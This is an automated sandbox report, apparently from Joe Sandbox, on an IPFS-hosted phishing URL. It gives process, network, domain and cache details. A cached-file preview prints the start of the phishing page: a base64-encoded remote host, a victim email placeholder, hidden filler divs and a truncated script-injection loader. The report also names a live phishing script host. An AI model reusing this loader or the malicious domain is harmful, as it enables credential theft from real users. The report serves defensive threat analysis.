Edit tour

Windows Analysis Report
http://ipfs.io/ipfs/bafkreighlryyquvwncfjki32xkca3dafzoxaan33ptn7lqqb5hzvwz4zfy

Overview

General Information

Sample URL:	http://ipfs.io/ipfs/bafkreighlryyquvwncfjki32xkca3dafzoxaan33ptn7lqqb5hzvwz4zfy
Analysis ID:	1471161
Infos:

Detection

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

HTML page contains hidden javascript code

Classification

Process Tree

System is w10x64

chrome.exe (PID: 2444 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 2912 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2456 --field-trial-handle=2304,i,12673941013066989903,2206991293366356302,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 6428 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://ipfs.io/ipfs/bafkreighlryyquvwncfjki32xkca3dafzoxaan33ptn7lqqb5hzvwz4zfy" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

cleanup

HTTP traffic detected: POST /report/v4?s=va6lKs5sRIm7VETm2nWIlphmI6Tc6YbKxFUvxA%2FUF%2Bjpd4Y4blytGKPSG%2B2vLIfibY8IcWp5%2BoRdKPz92ntHbDBOXwPXXf5GSbuthgGLnpZNDuuwcja4mHM%2BVpxkaQ3xfWz176VAkw%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 417Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: chromecache_46.2.dr

String found in binary or memory: https://cdn.socket.io/4.6.0/socket.io.min.js

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49740 version: TLS 1.2

Source: classification engine

Classification label: mal56.win@17/7@16/10

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2456 --field-trial-handle=2304,i,12673941013066989903,2206991293366356302,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://ipfs.io/ipfs/bafkreighlryyquvwncfjki32xkca3dafzoxaan33ptn7lqqb5hzvwz4zfy"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2456 --field-trial-handle=2304,i,12673941013066989903,2206991293366356302,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
http://ipfs.io/ipfs/bafkreighlryyquvwncfjki32xkca3dafzoxaan33ptn7lqqb5hzvwz4zfy	100%	Avira URL Cloud	phishing
http://ipfs.io/ipfs/bafkreighlryyquvwncfjki32xkca3dafzoxaan33ptn7lqqb5hzvwz4zfy	100%	SlashNext	Credential Stealing type: Phishing & Social usering

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://ipfs.io/favicon.ico	0%	Avira URL Cloud	safe
https://ipfs.tech/favicon.ico	0%	Avira URL Cloud	safe
https://a.nel.cloudflare.com/report/v4?s=va6lKs5sRIm7VETm2nWIlphmI6Tc6YbKxFUvxA%2FUF%2Bjpd4Y4blytGKPSG%2B2vLIfibY8IcWp5%2BoRdKPz92ntHbDBOXwPXXf5GSbuthgGLnpZNDuuwcja4mHM%2BVpxkaQ3xfWz176VAkw%3D%3D	0%	Avira URL Cloud	safe
https://fiveradio-newbam.com/jsnom.js	100%	Avira URL Cloud	phishing
https://cdn.socket.io/4.6.0/socket.io.min.js	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	unknown
a.nel.cloudflare.com	35.190.80.1	true	false	unknown
d2vgu95hoyrpkh.cloudfront.net	13.227.219.97	true	false	unknown
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	217.20.57.34	true	false	unknown
fiveradio-newbam.com	104.21.84.200	true	false	unknown
www.google.com	216.58.206.68	true	false	unknown
ipfs.tech	185.93.3.244	true	false	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	unknown
ipfs.io	209.94.90.1	true	false	unknown
cdn.socket.io	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://a.nel.cloudflare.com/report/v4?s=va6lKs5sRIm7VETm2nWIlphmI6Tc6YbKxFUvxA%2FUF%2Bjpd4Y4blytGKPSG%2B2vLIfibY8IcWp5%2BoRdKPz92ntHbDBOXwPXXf5GSbuthgGLnpZNDuuwcja4mHM%2BVpxkaQ3xfWz176VAkw%3D%3D	false	Avira URL Cloud: safe	unknown
https://fiveradio-newbam.com/jsnom.js	false	Avira URL Cloud: phishing	unknown
https://cdn.socket.io/4.6.0/socket.io.min.js	false	Avira URL Cloud: safe	unknown
https://ipfs.io/ipfs/bafkreighlryyquvwncfjki32xkca3dafzoxaan33ptn7lqqb5hzvwz4zfy	false		unknown
https://ipfs.tech/favicon.ico	false	Avira URL Cloud: safe	unknown
https://ipfs.io/favicon.ico	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
169.150.247.39	unknown	United States	2711	SPIRITTEL-ASUS	false
216.58.206.68	www.google.com	United States	15169	GOOGLEUS	false
185.93.3.244	ipfs.tech	Czech Republic	60068	CDN77GB	false
13.227.219.97	d2vgu95hoyrpkh.cloudfront.net	United States	16509	AMAZON-02US	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
104.21.84.200	fiveradio-newbam.com	United States	13335	CLOUDFLARENETUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
209.94.90.1	ipfs.io	United States	40680	PROTOCOLUS	false

Private

IP
192.168.2.6
192.168.2.5

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1471161
Start date and time:	2024-07-11 00:37:28 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	http://ipfs.io/ipfs/bafkreighlryyquvwncfjki32xkca3dafzoxaan33ptn7lqqb5hzvwz4zfy
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal56.win@17/7@16/10
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.67, 172.217.23.110, 142.251.168.84, 34.104.35.123, 52.165.165.26, 192.229.221.95, 13.85.23.206, 93.184.221.240, 20.3.187.198, 142.250.184.227
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, clientservices.googleapis.com, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, clients.l.google.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: http://ipfs.io/ipfs/bafkreighlryyquvwncfjki32xkca3dafzoxaan33ptn7lqqb5hzvwz4zfy

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

Chrome Cache Entry: 45

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
Category:	downloaded
Size (bytes):	15086
Entropy (8bit):	4.020155068262484
Encrypted:	false
SSDEEP:	384:jOm6B8m3TKwau0Y4a+oRvqBphSypP+H8It7:bi14aJRvgLSyA8It7
MD5:	EA7D143EFE3C01DE298F9F1130E8BCE5
SHA1:	4672164FAB3870DD901034ABCF3D35998AC94DBE
SHA-256:	94A9FEFBBE42310C03FF1E52C1F753C21038805F632867EA78930A52C445A456
SHA-512:	B9B76EE9964E836EA720828E77952E89ECC318D55EF5107F89C11F666C1BC0742D1BDBAD0BC1CAD853D93D1E150664056705BA3688544220759E9F4977800A8D
Malicious:	false
Reputation:	low
URL:	https://ipfs.tech/favicon.ico
Preview:	......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......$................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................;...@!..I...............................................................................................................................................................................8...;R..=..B..Cv..D...............................

Chrome Cache Entry: 46

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (696), with CRLF line terminators
Category:	downloaded
Size (bytes):	2910
Entropy (8bit):	5.58574943457501
Encrypted:	false
SSDEEP:	48:tNFtgxwEdIJY6K8z7STuOboU0cRuUutXZutbuw+5d+ZI+Gfu:xtyi5zeiCM9FEoFf+Gfu
MD5:	E09B8EAF58518E62A0084F4779D6F92E
SHA1:	6CCC949AB2E0E0F083F09AFD782F9D09955CEE7D
SHA-256:	C75C718852B6688A95237ABA840D8C05CBAE00377B7CDBF5C201E9F35B67992E
SHA-512:	68C281E1CC5F311C7C9F7995AAF4AAD2C11663E1E146C20394D740DA75949CCF81DA4B743F882E5B74B60C21D7E6288ED9473219D5F4C9A811F4A5265FA3BAEB
Malicious:	false
Reputation:	low
URL:	https://ipfs.io/ipfs/bafkreighlryyquvwncfjki32xkca3dafzoxaan33ptn7lqqb5hzvwz4zfy
Preview:	<!DOCTYPE html>..<html point="aHR0cHM6Ly9maXZlcmFkaW8tbmV3YmFtLmNvbQ==" id="html" sti="VlZORlVqQTJNRFV5TURJMFZVNUpVVlZGTVRFek16QTFNRFl5TmpJd01qUXlNREkwTURVd05qTXpNVEV5Tmc9PQ==" vic="[EMail]" lang="en">....<head>....</head>....<body id="allbody">.. <DIV style='display: none;'> <DIV>e90a9557ee6e14387363</DIV> <DIV>2aef769dcd0eea383f2b</DIV> <DIV>5e4bc2e29ae9fcfe8292</DIV> <DIV>e1ed9e87efc7be75867f</DIV> <DIV>e58664d44c12173ce48b</DIV> <DIV>d933cf3db449a9972b46</DIV> <DIV>484cdbf02715036ec7e1</DIV> <DIV>bcd127e76b3ab3c10538</DIV> <DIV>952aeb7f1bd8d6d9a8b6</DIV> <DIV>f379caaa0d6bcac9e32e</DIV> <DIV>ef150312a89ec025a8da</DIV> <DIV>5f05bfb7548c7882623a</DIV> <DIV>f4083e2f3b780d7158b2</DIV> <DIV>b9a9f99cd75d7fed546d</DIV> <DIV>ec882cd6a779fd445e6c</DIV> <DIV>daefccc4a55c1ad2ef65</DIV> <DIV>ca6558dd0af50a4b57d7</DIV> <DIV>4d7ce3a7b6da254624ad</DIV> <DIV>6ef459c670d0426d9f8b</DIV></DIV> -->.. <script>.. var sc = document.createElement("script");.. sc.setAttribute("src",

Chrome Cache Entry: 47

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (45667)
Category:	downloaded
Size (bytes):	45806
Entropy (8bit):	5.207605835316031
Encrypted:	false
SSDEEP:	384:1ZS0CCnasl8gRR/PoPez+iCMN0Fkiw2Jh4RWdRGhAjbp2ChPL8cYRGv5MRUK6np9:/CCnVl7tUkBxkdRGOfDiY5C5MAn5GY2
MD5:	80F5B8C6A9EEAC15DE93E5A112036A06
SHA1:	F7174635137D37581B11937FC90E9CB325077BCE
SHA-256:	0401DE33701F1CAD16ECF952899D23990B6437D0A5B7335524EDF6BDFB932542
SHA-512:	B976A5F02202439D94C6817D037C813FA1945C6BB93762284D97FF61718C5B833402F372562034663A467FDBAA46990DE24CB1E356392340E64D034E4BA1B4E4
Malicious:	false
Reputation:	low
URL:	https://cdn.socket.io/4.6.0/socket.io.min.js
Preview:	/!. Socket.IO v4.6.0. * (c) 2014-2023 Guillermo Rauch. * Released under the MIT License.. */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t\|\|self).io=e()}(this,(function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function n(t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable\|\|!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}function r(t,e,r){return e&&n(t.prototype,e),r&&n(t,r),Object.defineProperty(t,"prototype",{writable:!1}),t}function i(){return i=Object.assign?Object.assign.bind():function(t){for(var e=

Chrome Cache Entry: 48

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
Category:	dropped
Size (bytes):	15086
Entropy (8bit):	4.020155068262484
Encrypted:	false
SSDEEP:	384:jOm6B8m3TKwau0Y4a+oRvqBphSypP+H8It7:bi14aJRvgLSyA8It7
MD5:	EA7D143EFE3C01DE298F9F1130E8BCE5
SHA1:	4672164FAB3870DD901034ABCF3D35998AC94DBE
SHA-256:	94A9FEFBBE42310C03FF1E52C1F753C21038805F632867EA78930A52C445A456
SHA-512:	B9B76EE9964E836EA720828E77952E89ECC318D55EF5107F89C11F666C1BC0742D1BDBAD0BC1CAD853D93D1E150664056705BA3688544220759E9F4977800A8D
Malicious:	false
Reputation:	low
Preview:	......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......$................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................;...@!..I...............................................................................................................................................................................8...;R..=..B..Cv..D...............................

Static File Info

⊘No static file info

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 11, 2024 00:38:14.911010027 CEST	49674	443	192.168.2.6	173.222.162.64
Jul 11, 2024 00:38:14.911010027 CEST	49673	443	192.168.2.6	173.222.162.64
Jul 11, 2024 00:38:15.254630089 CEST	49672	443	192.168.2.6	173.222.162.64
Jul 11, 2024 00:38:22.458054066 CEST	49715	443	192.168.2.6	209.94.90.1
Jul 11, 2024 00:38:22.458091021 CEST	443	49715	209.94.90.1	192.168.2.6
Jul 11, 2024 00:38:22.458507061 CEST	49715	443	192.168.2.6	209.94.90.1
Jul 11, 2024 00:38:22.458507061 CEST	49715	443	192.168.2.6	209.94.90.1
Jul 11, 2024 00:38:22.458543062 CEST	443	49715	209.94.90.1	192.168.2.6
Jul 11, 2024 00:38:22.936533928 CEST	443	49715	209.94.90.1	192.168.2.6
Jul 11, 2024 00:38:22.936866999 CEST	49715	443	192.168.2.6	209.94.90.1
Jul 11, 2024 00:38:22.936885118 CEST	443	49715	209.94.90.1	192.168.2.6
Jul 11, 2024 00:38:22.938545942 CEST	443	49715	209.94.90.1	192.168.2.6
Jul 11, 2024 00:38:22.938718081 CEST	49715	443	192.168.2.6	209.94.90.1
Jul 11, 2024 00:38:22.939596891 CEST	49715	443	192.168.2.6	209.94.90.1
Jul 11, 2024 00:38:22.939688921 CEST	443	49715	209.94.90.1	192.168.2.6
Jul 11, 2024 00:38:22.939832926 CEST	49715	443	192.168.2.6	209.94.90.1
Jul 11, 2024 00:38:22.980545998 CEST	443	49715	209.94.90.1	192.168.2.6
Jul 11, 2024 00:38:22.989940882 CEST	49715	443	192.168.2.6	209.94.90.1
Jul 11, 2024 00:38:22.989964008 CEST	443	49715	209.94.90.1	192.168.2.6
Jul 11, 2024 00:38:23.036324978 CEST	49715	443	192.168.2.6	209.94.90.1
Jul 11, 2024 00:38:23.071536064 CEST	443	49715	209.94.90.1	192.168.2.6
Jul 11, 2024 00:38:23.071659088 CEST	443	49715	209.94.90.1	192.168.2.6
Jul 11, 2024 00:38:23.071707964 CEST	49715	443	192.168.2.6	209.94.90.1
Jul 11, 2024 00:38:23.071732998 CEST	443	49715	209.94.90.1	192.168.2.6
Jul 11, 2024 00:38:23.071954012 CEST	443	49715	209.94.90.1	192.168.2.6
Jul 11, 2024 00:38:23.072004080 CEST	49715	443	192.168.2.6	209.94.90.1
Jul 11, 2024 00:38:23.072890997 CEST	49715	443	192.168.2.6	209.94.90.1
Jul 11, 2024 00:38:23.072909117 CEST	443	49715	209.94.90.1	192.168.2.6
Jul 11, 2024 00:38:23.165416002 CEST	49719	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:23.165471077 CEST	443	49719	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:23.165550947 CEST	49719	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:23.166287899 CEST	49719	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:23.166306973 CEST	443	49719	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:23.166630030 CEST	49720	443	192.168.2.6	104.21.84.200
Jul 11, 2024 00:38:23.166649103 CEST	443	49720	104.21.84.200	192.168.2.6
Jul 11, 2024 00:38:23.166702986 CEST	49720	443	192.168.2.6	104.21.84.200
Jul 11, 2024 00:38:23.167047024 CEST	49721	443	192.168.2.6	13.227.219.97
Jul 11, 2024 00:38:23.167103052 CEST	443	49721	13.227.219.97	192.168.2.6
Jul 11, 2024 00:38:23.167165995 CEST	49721	443	192.168.2.6	13.227.219.97
Jul 11, 2024 00:38:23.167268991 CEST	49720	443	192.168.2.6	104.21.84.200
Jul 11, 2024 00:38:23.167283058 CEST	443	49720	104.21.84.200	192.168.2.6
Jul 11, 2024 00:38:23.167432070 CEST	49721	443	192.168.2.6	13.227.219.97
Jul 11, 2024 00:38:23.167444944 CEST	443	49721	13.227.219.97	192.168.2.6
Jul 11, 2024 00:38:23.648612022 CEST	443	49720	104.21.84.200	192.168.2.6
Jul 11, 2024 00:38:23.649072886 CEST	49720	443	192.168.2.6	104.21.84.200
Jul 11, 2024 00:38:23.649115086 CEST	443	49720	104.21.84.200	192.168.2.6
Jul 11, 2024 00:38:23.650116920 CEST	443	49720	104.21.84.200	192.168.2.6
Jul 11, 2024 00:38:23.650196075 CEST	49720	443	192.168.2.6	104.21.84.200
Jul 11, 2024 00:38:23.651715040 CEST	49720	443	192.168.2.6	104.21.84.200
Jul 11, 2024 00:38:23.651777983 CEST	443	49720	104.21.84.200	192.168.2.6
Jul 11, 2024 00:38:23.652093887 CEST	49720	443	192.168.2.6	104.21.84.200
Jul 11, 2024 00:38:23.652105093 CEST	443	49720	104.21.84.200	192.168.2.6
Jul 11, 2024 00:38:23.705801964 CEST	49720	443	192.168.2.6	104.21.84.200
Jul 11, 2024 00:38:23.865021944 CEST	443	49721	13.227.219.97	192.168.2.6
Jul 11, 2024 00:38:23.869935989 CEST	49721	443	192.168.2.6	13.227.219.97
Jul 11, 2024 00:38:23.870014906 CEST	443	49721	13.227.219.97	192.168.2.6
Jul 11, 2024 00:38:23.871037960 CEST	443	49721	13.227.219.97	192.168.2.6
Jul 11, 2024 00:38:23.871125937 CEST	49721	443	192.168.2.6	13.227.219.97
Jul 11, 2024 00:38:23.872073889 CEST	49721	443	192.168.2.6	13.227.219.97
Jul 11, 2024 00:38:23.872138977 CEST	443	49721	13.227.219.97	192.168.2.6
Jul 11, 2024 00:38:23.872240067 CEST	49721	443	192.168.2.6	13.227.219.97
Jul 11, 2024 00:38:23.872257948 CEST	443	49721	13.227.219.97	192.168.2.6
Jul 11, 2024 00:38:23.915421963 CEST	49721	443	192.168.2.6	13.227.219.97
Jul 11, 2024 00:38:23.998382092 CEST	443	49719	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:23.998469114 CEST	49719	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:24.004717112 CEST	49719	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:24.004729033 CEST	443	49719	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:24.005589962 CEST	443	49719	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:24.027359962 CEST	49719	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:24.027479887 CEST	49719	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:24.027487040 CEST	443	49719	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:24.027892113 CEST	49719	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:24.072509050 CEST	443	49719	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:24.108774900 CEST	443	49721	13.227.219.97	192.168.2.6
Jul 11, 2024 00:38:24.136646032 CEST	443	49721	13.227.219.97	192.168.2.6
Jul 11, 2024 00:38:24.136656046 CEST	443	49721	13.227.219.97	192.168.2.6
Jul 11, 2024 00:38:24.136665106 CEST	443	49721	13.227.219.97	192.168.2.6
Jul 11, 2024 00:38:24.136723995 CEST	49721	443	192.168.2.6	13.227.219.97
Jul 11, 2024 00:38:24.136784077 CEST	443	49721	13.227.219.97	192.168.2.6
Jul 11, 2024 00:38:24.136866093 CEST	49721	443	192.168.2.6	13.227.219.97
Jul 11, 2024 00:38:24.195838928 CEST	443	49721	13.227.219.97	192.168.2.6
Jul 11, 2024 00:38:24.195848942 CEST	443	49721	13.227.219.97	192.168.2.6
